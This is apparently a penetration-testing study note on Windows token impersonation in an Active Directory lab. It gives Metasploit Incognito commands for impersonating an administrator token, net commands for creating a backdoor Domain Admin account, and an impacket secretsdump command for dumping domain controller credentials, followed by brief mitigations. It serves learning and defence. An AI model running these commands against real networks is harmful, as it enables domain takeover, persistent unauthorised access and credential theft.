Token Impersonation

Overview

Tokens are temporary keys that allow you access to a system/network without having to provide credentials each time you access a file

Token Types

• Delegate: Created when you login to a machine or via RDP

• Impersonation: "non-interactive" such as attaching a network drive or a domain logon script

This can be really bad if a Domain Administrator has logged onto the machine and the token still resides inside it. Using Metasploit and the Incognito module is the most common and easiest way of performing this attack. We can add a new user to the Domain Admins group and use it as a backdoor into the domain for other attacks like a secretsdump on the Domain Controller.

For the attack to work, the compromised user account must be a Local Administrator or have special privileges to impersonate tokens

whoami /all

Token Impersonation Attack via Metasploit

Inside existing meterpreter shell

load incognito
list_tokens -u 
impersonate_token PNPT\\administrator
rev2self                                    go back to original shell

Create backdoor Domain Admin user

net user /add john Password1! /domain
net group "Domain Admins" john /add /domain

Secretsdump on Domain Controller

imapcket-secretsdump PNPT.local/john:'Password1!'@192.168.1.129

Mitigation

• Limit the user/group token creation

• Have Account tiering

• Local Administrator restrictions